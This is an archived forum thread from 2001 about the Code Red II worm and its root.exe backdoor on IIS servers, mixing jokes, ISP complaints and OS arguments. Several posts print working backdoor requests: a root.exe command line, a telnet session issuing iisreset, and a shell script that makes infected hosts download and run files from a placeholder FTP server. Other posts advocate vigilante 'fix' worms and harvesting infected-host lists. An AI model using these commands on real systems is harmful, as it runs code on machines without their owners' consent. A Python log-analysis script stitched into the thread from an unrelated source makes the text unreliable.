    With this high a number of scans it is now suicidal to install IIS while connected to the net. Chances are very good that your box will get compromised before you have a chance to apply the patch, even if you do so right away. And since people can easily set up a reverse hack to automatically do other nasty stuff to your box after THEY get probed, the risk is even higher.

    Solution, never ever have your box plugged into the network while installing a Windows server. Only plug it in after all patches, service packs, and hot fixes have been applied first.

  151. Re:cisco 675 hanging. by cowboy+junkie · · Score: 2

    Welp, I've just tried changing the port to see how that will work (my connection has been up and down like a yo-yo for the past couple of days). Qworst doesn't have the 2.4.2 update available and for some reason Cisco doesn't want to make it available directly to customers.

    On a lighter note, Qworst's support # had a 111 minute wait to talk to someone tonight...gotta love it...

  152. Re:Rooted? Lemme get this straight.... by dillon_rinker · · Score: 2

    Or my favorite techno-mangling of the English language:

    administrated

  153. Re:A few more details:It's a root trojan by glokkpod · · Score: 2, Interesting

    I've been tinkering and I've found that this will help cure the "root exploit":

    GET /scripts/root.exe?/c+ren+root.exe+infected.dat HTTP/1.0

  154. Re:Neat little proggie I wrote.. by JediTrainer · · Score: 2

    Thanks! I ran your proggy on my box, and here's what I got:

    I'm in the 24.x.x.x range, so I'm getting bashed quite a bit.

    Code Red 1:
    Unique IPs: 105
    Total hits: 105

    Code Red 2:
    Unique IPs: 172
    Total hits: 395

    This count is rising by the minute! No wonder my cable modem's been going nuts the last few days!

    --

    You can accomplish anything you set your mind to. The impossible just takes a little longer.
  155. How to generate a list of ALL CRII infected hosts by braddock · · Score: 2
    This analysis at http://braddock.com/cr2.html describes a means through which a complete list of the thousands of CodeRed II infected and backdoor compromised hosts can be easily obtained by any individual who has been keeping a web server log of attempts on his machine, by using the backdoors on the machines that have attacked him to obtain the web logs of the infected attacking IIS web servers to learn of new infected hosts.

  156. Speakeasy's TOS by Greyfox · · Score: 2

    I seem to recall that Speakeasy will shut you down for "hacking activity," even if that activity occurred because your system was compromised. They pretty much demand that you keep your system secure in their TOS (Which I don't object to at all, mind you.)

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  157. Re:Something that should happen more often. by Malcontent · · Score: 2

    Wow that was in 1988. I'd say it's a pretty good record.

    Let's count the number of IIS remote hacks and the number of apache remote hacks and see who wins.

    --

    War is necrophilia.

  158. Re:I'm getting pounded at 216. by Saint+Aardvark · · Score: 2

    Lots of arp who-has? I've been getting that here at 216. too...deliberately started up apache just to have something to catch the attemps, but nothing yet -- just all those damn arps. Makes for boring tcpdump watching, that's for sure...

  159. Re:Hey... maybe we can use an M$ exploit to FIX th by raju1kabir · · Score: 2
    Why the hell would we need default.ida to xploit IIS? Plus, imagine how much bandwidth would be wasted with that.. and more, Apache runs mostly on Linux or other Unix-based OS, so CR is not effective against them..

    Either you didn't read the message at all, or you are an extremely dumb person.

    What he's suggesting is to set up Apache so that it will automatically repair any IIS servers that attack it.

    Has nothing to do with whether Apache is vulnerable to anything.

    --
    "Patriotism is your conviction that this country is superior to all other countries because you were born in it." -- GBS
  160. Proposal for White Hat'ing CR][ by nebby · · Score: 5, Informative

    Since it seems that it's possible to run, and basically do, anything trivially on any of these infected computers via the root.exe "script" I'm guessing that a lot of shit is going to go down in the next two days that will probably be both good and bad for Microsoft and the public's understanding of network security.

    I'm also guessing that right now a bunch of /.'ers are doing one of two things:

    1) Writing scripts to make things suck more for those who have been compromised (shame on you)
    or
    2) Writing scripts to fix the compromised servers

    I propose that if a script is created to fix these servers (Code Green? :)) that it not be launched until after Monday afternoon around 3 or 4PM, since this is a serious problem for both sysadmins and Microsoft. If a large part of the damage is avoided by white hat hackers sending a cure for the virus out, it will only happen again. If you don't give them time to sweat, then nothing will be changed and an even more malicious virus (which say, deletes the entire contents of the drives or something) will be unleashed soon enough.

    So, before you go out and launch a cure for the problem, think twice about the long term effects of doing so. Create it, make sure it works, and then the Open Source movement can release a cure for the problem faster than anyone else and "we" (I'm not really part of the OSS movement, or whatever) will look like the good guys. Instead of the media holding Microsoft on high for providing the cure to a problem they caused, if the patch is done and ready and launched by Monday afternoon they will have egg on their faces.

    Thanks.

    --
    --
  161. [Fill in the blanks] by LS · · Score: 2


    I find it really [lame|!1337|st00pid|boring] how a joke will appear and everyone will copy it. Imagine if I had a [Beowulf cluster|DDoS network|Wireless network] full of bots posting stupid clones of jokes we already saw and laughed [never|once|more than we should have] at. [All your base belong to us|FUCK THINK GEEK|Once again, mod me down]. [Mod me down|be careful what you wish for, you will be modded down|shut up you schizoid freak]. Anyway, I'm drunk, as in [Free beer|Stupid assholes, where do you get free beer?|Stupid assholes, why are you trying to compare free speech with beer? I wonder why you get so little public support|Hey, did you see Dune the mini series? It ROCKED!] [Sorry, do punctuation marks go AFTER or BEFORE the bracket?]?

    [Anyway|Moving On|Madlibs are for 7 year olds at birthday parties high on sugar and plastic toy fumes], I hope we have come to an understanding that [transparent cases|shock the penguin - FUCK COMPAQ|old men with extremely wide assholes pictured on Christmas Island websites] are no longer [novel|interesting|clever.].

    --
    There is a fine line between being a cultivated citizen and being someone else's crop. - A. J. Patrick Liszkie
  162. Bookmarklet for IIS detection? by Cato · · Score: 2

    I'm not a JavaScript person, but how about writing a bookmarklet to take the current page's URL and query Netcraft for use of IIS and warn the user if it is? Bookmarklets are bookmarks that run small JavaScript programs - more info at http://www.bookmarklets.com/

  163. @home problems... by garett_spencley · · Score: 2
    Slow service? I don't know about other @home customers (I'd like to hear) but my net connection was completely _down_ for about 8 hours this afternoon. As a matter of fact I just got back on.

    The interesting thing was that the "cable" light on my cable modem was still on when usually when I can't get on the net it is off.

    So I wonder what the problem really was. If maybe the routers were all up but the dhcp servers were down or something....

    Anyone else have similar problems?

    --
    Garett

    1. Re:@home problems... by garett_spencley · · Score: 2
      When service was down, I would ping my subnet's default gateway, and not receive a response. I subscribe to 2 IPs, on different subnets, and they've both been affected at various different times.

      But when that happens the light on the cable modem goes out. So it wasn't router issues.

      Personally, I feel that if this continues, @Home needs to credit me back part of my subscription fee.

      Yeah I'm thinking of switching to DSL personally. I know that this particular situation was not @home's fault (well, that is up for debate since if they didn't deploy IIS none of this would happen) but I've been experiencing really shitty service ever since I subscribed. A lot of down time really often.

      --
      Garett

    2. Re:@home problems... by coyote-san · · Score: 2

      @Home could block inbound HTTP queries (port 80, destination address in their block) without affecting outbound HTTP queries or their responses.

      However, is this practical? It's hard to say - it should really be done at the lowest subnets, and that would take some effort to set up. Then again, the cost of doing nothing is rapidly adding up - my modem light has been on continuously for 24 hours. I haven't see this since I downloaded the ~20GB TIGR GIS data set. :-)

      --
      For every complex problem there is an answer that is clear, simple, and wrong. -- H L Mencken
  164. Re:If this can't break Microsoft's back nothing wi by cybrthng · · Score: 2
    Well, i do run linux at home, but at work they require windows for the sake of office which i don't use anyhow. (i'm a DBA, i sit on Sun boxen all day writing sql code or fixing databases from a shell prompt).

    Even for windows users, a 120.00 linksys box and some know-how will protect you. At least close the blatant problems and protect your internal network.

    People need to realise it is like putting locks on the doors to your house. Unless you're safe and secure you're allowing *ANYONE IN!*

  165. Re:A few more details:It's a root trojan by Malcontent · · Score: 2

    Every system shows an occasional defect. With MS it's an epidemic. Every week it's a new exploit.

    --

    War is necrophilia.

  166. Re:Source? by Maditude · · Score: 2, Insightful

    Here's a speedy one...

    #!/bin/sh
    grep default.ida /var/log/httpd-access.log | cut -f 1 -d ' ' | sort
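The counting done by hand in the posts above (unique IPs and total hits per worm variant, as in the "Code Red 1 / Code Red 2" tally, plus the one-liner that extracts attacking IPs) can be done in one pass over an Apache access log. This is an added example, not code from any of the posters; it assumes the common combined log format, uses constructed sample lines rather than real captures, and anchors the filler pattern directly after `default.ida?` so that stray strings like `XNNX` are not counted, as one reply points out. It also reports how many probes came from the observer's own class A and class B blocks, which is the propagation bias described at the top of the story.

```python
import re
from collections import defaultdict

# Constructed sample log lines (not real captures). Real probes carry a long
# encoded payload after the N/X filler; it is shortened here.
SAMPLE_LOG = """\
24.0.0.17 - - [05/Aug/2001:14:43:22 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 289 "-" "-"
24.0.0.42 - - [05/Aug/2001:14:44:01 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 289 "-" "-"
24.0.0.42 - - [05/Aug/2001:14:54:09 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 289 "-" "-"
10.1.2.3 - - [05/Aug/2001:15:01:12 -0400] "GET /index.html HTTP/1.0" 200 1532 "-" "Mozilla/4.0"
24.7.7.7 - - [05/Aug/2001:15:02:00 -0400] "GET /default.ida?XNNXXNNXXNNX HTTP/1.0" 404 289 "-" "-"
216.5.5.9 - - [05/Aug/2001:15:02:45 -0400] "GET /default.ida?NNNNNNNNNNNNNNNNNNNN HTTP/1.0" 404 289 "-" "-"
24.9.9.9 - - [05/Aug/2001:15:10:30 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXX HTTP/1.0" 404 289 "-" "-"
"""

# Apache combined log: client ip, ident, user, [timestamp], "request", status, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)(?: (?P<proto>[^"]*))?" (?P<status>\d{3})'
)

# Anchored right after "default.ida?": Code Red v1 pads with N, Code Red II
# with X. Anchoring is what keeps "XNNX"-style noise out of the counts.
PROBE_RE = re.compile(r'^/default\.ida\?(?P<filler>N{4}|X{4})')
VARIANT = {'NNNN': 'Code Red 1', 'XXXX': 'Code Red 2'}


def parse_line(line):
    """Return the log fields as a dict, or None if the line is not in the expected format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify(path):
    """Return 'Code Red 1', 'Code Red 2', or None for a request path."""
    m = PROBE_RE.match(path)
    return VARIANT[m.group('filler')] if m else None


def same_prefix(ip_a, ip_b, octets):
    """True if the first `octets` dotted-quad octets match (1 = class A /8, 2 = class B /16)."""
    return ip_a.split('.')[:octets] == ip_b.split('.')[:octets]


def probing_hosts(log_text):
    """Sorted unique source IPs that sent any default.ida probe (the 'grep | cut | sort' idea)."""
    ips = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and classify(rec['path']):
            ips.add(rec['ip'])
    return sorted(ips)


def summarize(log_text, local_ip):
    """Per-variant unique IPs, total hits, and how many hits came from the observer's /8 and /16."""
    hits = defaultdict(list)  # variant -> one entry per hit (source IP)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if not rec:
            continue  # skip malformed lines rather than miscount
        variant = classify(rec['path'])
        if variant:
            hits[variant].append(rec['ip'])
    summary = {}
    for variant, ips in hits.items():
        summary[variant] = {
            'unique_ips': len(set(ips)),
            'total_hits': len(ips),
            'same_class_a': sum(same_prefix(ip, local_ip, 1) for ip in ips),
            'same_class_b': sum(same_prefix(ip, local_ip, 2) for ip in ips),
        }
    return summary


if __name__ == '__main__':
    # '24.0.1.1' is a constructed address standing in for the log owner's own IP.
    for variant, stats in sorted(summarize(SAMPLE_LOG, '24.0.1.1').items()):
        print(f"{variant}:")
        for key, value in stats.items():
            print(f"  {key}: {value}")
    print("Probing hosts:", ", ".join(probing_hosts(SAMPLE_LOG)))
```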

  167. Re:Why not fight back ??? by fanatic · · Score: 2

    Microsoft's did it in advance with the EULA

    Most courts still find licenses imposed after purchase to be meaningless. These are nothing more (unless you live in Maryland or Virginia, where UCITA has already passed) than an attempt to convince you that you don't have the rights that you in fact do.

    This is why UCITA is such an evil piece of crap. EULAs would be binding under UCITA.

    --
    "that's not encryption - it's a new perl script that I'm working on..." - from some Matrix parody
  168. Re:Does anyone know.... by J'raxis · · Score: 2

    It's software-based, not hardware-. This is not a "computer worm," it's a Windows worm. Much like the ones that only attack Outlook, this one only travels through IIS, Microsoft's webserver.

  169. Re:Why don't they... by Malcontent · · Score: 2

    Yes because MS does not have enough programmers or enough money or enough computers to actually do this themselves. We should all roll up our sleeves and provide free labor for MS. Of course we should also ignore them when they call us communists, un-American and a "cancer". After all they need our help in fixing their broken systems.

    --

    War is necrophilia.

  170. File download script by nebby · · Score: 2
    I played around for a few hours with this, trying to make a ghetto script that would fix the servers. There's no way for me to be sure my other stuff works, but the thing I did get working was a script to download files to the infected server from an ftp site.


    #!/bin/sh
    # Code Red ][ Download File script
    # Usage: dlfile.sh infectedIP filename
    #
    # Please set the $ftp and $dir values to
    # the ftp and directory of the patch and shutdown repository

    # For ftp.youhavesetup.com
    FTP="ftp%2eyouhavesetup%2ecom"
    # Directory /pub/cr
    DIR="%2fpub%2fcr"

    echo GET /scripts/root.exe?+%2fc+echo+bin+%3etmpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+get+$DIR%2f$2+%3e%3et mpfile | telnet $1 80
    sleep 1
    echo GET /scripts/root.exe?+%2fc+echo+ftp+%2dA+%2ds%3atmpfi le+$FTP+%3edlfile%2ecmd | telnet $1 80
    # Note that slashcode inserts a space in the string 'tmpfile' on both these lines, remove before running
    sleep 1
    echo GET /scripts/root.exe?+/k+dlfile%2ecmd | telnet $1 80


    I tried setting it up and got the servers to download the patches, but I can't be sure that they are actually run. (I don't have an infected machine to test.) Also, I was unable to figure out a way to get the machines to reboot or restart IIS. It appears root.exe has limited permission in what it can do (as another poster or two stated.) There might be hacks that will do what I want to, but I'm too tired to mess with this anymore :)

    --
    --
  171. Re:But does it actually *do* anything different? by Anonymous Coward · · Score: 2, Informative

    "Antony Riley has further made a tentative confirmation that the new worm installs a back door that leaves the server wide open for attack (a command shell is available by using telnet to access the server)." from today's diary entry at a well known worm incident place (please don't post the url, I don't want them swamped; I already can't get thru to another place that posted an url that gives further details).

  172. Why don't they... by Greyfox · · Score: 4, Insightful

    Modify the code red code to apply the security patch to the vulnerable IIS servers and reboot the system? While this is potentially destructive to your system (I'm told -- MS security patches and all that) it would pretty well take care of this problem...

    --

    I'm trying to teach myself to set people on fire with my mind... Is it hot in here?

  173. Something that should happen more often. by RzUpAnmsCwrds · · Score: 5, Funny

    Man, I'm glad that I'm not using [Microsoft Product]. This new [virus/worm/trojan] exploits a [flaw/bug/backdoor] in [Microsoft Product], and it [does/doesn't] use Outlook and the stupidity of users. Luckily, I'm running [Free alternative to Microsoft product], so I'm not at risk. In fact, [Free alternative to Microsoft product] has protected me from [any integer over 200] [viruses/worms/trojans]. And just look at the [hundreds/thousands/millions/billions] of dollars that I've saved using [Free alternative to Microsoft product]. I hope that this [Free alternative to Microsoft product] takes off, along with [free alternative to Microsoft OS]. Unfortunately, my [company/home] has to pay for the stupidity of Microsoft: this [virus/worm/trojan] sucked [250KB/250MB/250GB/250TB] of bandwidth!

    1. Re:Something that should happen more often. by Malcontent · · Score: 2

      Since I happen to use debian I am subscribed to the security listserve.

      Once again. Let's count the number of remote exploits for apache and IIS and decide which system is more secure. So far you have pointed out two defects. One in 1988 which was a worm and one recently which allowed directory listings (but no code execution). I'd say that's an admirable track record.

      When confronted with these facts any sysadmin who continues to use an insecure system like IIS is criminally negligent. Any organization which chooses to deploy such an unsecure web server ought to be sued.

      --

      War is necrophilia.

    2. Re:Something that should happen more often. by sheldon · · Score: 2

      IIS consists of:

      Web Server
      FTP Server
      Indexing server
      SMTP server
      NNTP server

      and maybe a slew of other things, if you consider IIS4 shipped with MTS and MSMQ.

      So in comparing IIS to Apache you are limiting the scope of the argument, which might seem clever to you, but is unfair.

      How many exploits have there been to mail and ftp servers on Linux?

  174. what MS has done. by jon_c · · Score: 2

    If you go to microsoft.com you will not see anything about CodeRed. however a quick search will find you this which is that patch.

    One nice thing about the worm is that it is only active in memory, meaning that if you reboot your machine it will die.

    The unfortunate part is that I don't see it helping much. I think the problem is that there are thousands of neglected NT/2K boxes with net connections, collecting dust, and getting eaten by worms. Soon this will be called the infected net, the part of the internet that has withered into sludge and pounds away at the rest of the net.

    After a while the media will infect the people, soon follows the lawmakers. Once that happens the government will mandate that computers on the public net must be licensed, and maintained regularly. If your computer is infected by a worm, virus, trojan etc.. you will be issued a fine. The internet will be taxed to support the "federal internet safety commission", a group of FCC rejects that constantly monitor and scan your box to make sure you're up to code.

    -Jon

    --
    this is my sig.
  175. This is great by GC · · Score: 2
    root@gate:~# telnet x.x.x.x 80
    Trying x.x.x.x...
    Connected to x.x.x.x.
    Escape character is '^]'.
    GET /scripts/root.exe?/c+iisreset HTTP/1.0

    HTTP/1.1 502 Gateway Error
    Server: Microsoft-IIS/5.0
    Date: Sun, 05 Aug 2001 14:43:22 GMT
    Content-Length: 215
    Content-Type: text/html

    Error in CGI Application
    CGI ErrorThe specified CGI application misbehaved by not returning a complete set of HTTP headers. The headers it did return are:

    Connection closed by foreign host.
    root@gate:~# telnet x.x.x.x 80
    Trying x.x.x.x...

  176. Re:This web page was changed... by Saint+Aardvark · · Score: 2
    Just wanted to share my shell script for getting a handy page w/links to all the infected sites I've logged:

    grep ida /foo/bar/log | awk '{print $1}' | sort | uniq |\
    awk '{print "<a href=\"http://" $1 "/\">" $1 "</a><br>"}'

    So 3133t it hurts...

  177. Re:Would you like some cheese to go with your whin by cybrthng · · Score: 2, Flamebait

    waaaa waaaaa if no one asked why, then we wouldn't be here

  178. Hypothesis by nebby · · Score: 2

    I bet they launched it on Saturday morning on purpose (or Friday night even.) By the time Sunday is over, the hacker(s) will have root access to a shitload of computers, and the sysadmins who hesitated patching showing up Monday morning will have long been 0wned.

    Like someone said elsewhere, the best (and only I think) way to partially fix this problem is to write a variant of the worm (Code Green? :)) that fixes all the servers before it gets out of hand. Apache server or not, if 100,000 computers are infected, the traffic costs of Code Red 1, 2, etc. hits alone will be enough of a incentive to fix the IIS servers. (Though it is kind of exciting to think of Microsoft having egg on their faces Monday morning when they get DoSed by 100,000 cable modems in one deafening yell.. but I digress)

    --
    --
  179. Re:There's been stacks of Unix worms this year by Malcontent · · Score: 2

    Most services can be jailed.

    BTW Linux has permission systems if you choose to implement them. Unlike the windows world we get choices.

    --

    War is necrophilia.

  180. Re:There's been stacks of Unix worms this year by Malcontent · · Score: 2

    There are filesystems which support ACLs you ought to look into them. As you stated there are also capability systems you can implement.

    Whether to chroot services or not is a decision made by the sysadmin.

    --

    War is necrophilia.

  181. What about.... by jarodss · · Score: 4, Funny

    My range, I don't seem to find anything coming from 127.x.x.x and I installed CodeRedII myself.

  182. Re:It's not safe to install IIS while on a network by Bob+Uhl · · Score: 2

    It's not safe to install IIS or any MS OS. Period. Don't plug it in after you've installed; you know that you'll be hit again. Install a real OS--Linux, FreeBSD, OpenBSD, NetBSD--and go to town. They're all general-purpose OSes. They can all do what you need. Deal with their problems; it's better than deal with Microsoft's.

  183. Re:If this can't break Microsoft's back nothing wi by Bob+Uhl · · Score: 2
    The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends. Not quite (or at least, not the way you're thinking, I believe). An OS with capabilities doesn't have quite the same issue. Essentially, a capability is permission to do something: see a file, read it, execute it, open a network connection. In such an OS, the web server is given capabilities to: see everything in its docroot; execute everything in its cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use.

    Capability systems are far more complex than older, permissions-based systems. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something? With the right administration tools, capabilities should be doable. And worms like Code Red would be made much more difficult.

  184. Re:If this can't break Microsoft's back nothing wi by Bob+Uhl · · Score: 2
    A previous poster quoth:

    The reason the "core functionality" of your PC is "allowed" to distribute your private information is because it has to be able to do so if you're going to write emails to your friends.

    Bear with me--trying to break the no-dups posting rule...

    Not quite (or at least, not the way you're thinking). An OS with capabilities doesn't have quite the same issues as one without. Essentially, a capability is permission to do something: see a file, read it, delete it, execute it, open a network connection. In such an OS, the web server is given capabilities to: see everything in its docroot; execute everything in its cgi-bin; receive network connexions. It cannot read your personal data; it cannot open its own network connexion. Done right, it cannot even access libraries it doesn't use. It's a very interesting concept.

    Capability systems are much more complex than older, permissions-based systems; they can be much slower. But don't we owe it to ourselves to use some of our spare CPU cycles and bytes to actually do something useful, such as prevent break-ins? With the right administration tools, capabilities should be about as easy as current permission systems. And worms like Code Red would be made much more difficult. Not impossible--but more difficult.

    Damn bloody no-resubmit code sux. Have to change this article enough to let the blankety-blank slashcode let me through 'cause I made a mistake on the previous post. Bloody friggin heck.

    And the stupid 20-second rule is getting me now.

  185. Re:If this can't break Microsoft's back nothing wi by IronChef · · Score: 2



    - Operating systems are more complex than cars.
    - Operating systems don't require a license to be operated.


    Irrelevant. There are plenty of products that are more complex than cars, and consumers are still protected if they fail dramatically. Pharmaceuticals, for example. Designing a molecule and testing it is at least as difficult as designing a car.

    Do you seriously think that the complexity of the product is an excuse? That's crazy. Far better to ask the companies to simply know their limitations, and not ship products that they can't build to reasonable standards of quality.

    The licensing issue is irrelevant too. If my microwave catches fire, I can sue somebody. If my custom-built house collapses, I can sue somebody. If my shotgun explodes, I can sue somebody.

    I don't mean to sound sue-crazy -- but the only deterrent we, the public, have, is our ability to use the legal system to whack companies that try to pull a fast one on us. If we lose that ability, we'll have nothing but crap to choose from.

  186. Re:Why good people use bad webservers by sheldon · · Score: 2

    Isn't this what an IT department should be doing?

    If the marketing department had installed a default install of RedHat 6.2 without patching it'd also be full of holes.

    But would this have magically made the marketing department more clueful?

    I don't see how.

  187. There's been stacks of Unix worms this year by Nailer · · Score: 2

    There's been stacks of Unix worms this year:

    * l10n
    * adore
    * Red Worm
    and a whole bunch of variants.

    And there will be more in the future as Linux becomes more mainstream. A virus would also be completely possible - sure, default permissions mean a virus acting on behalf of an ordinary user can't do nasty things to `cp', but it can delete that user's last 5 years of work.

    Linux still lacks a real permission system, and there are unfortunately still many apps which run with unnecessary root privileges, rather than single-root-component (think Postfix) or 2.4's capabilities (think ProFTPd).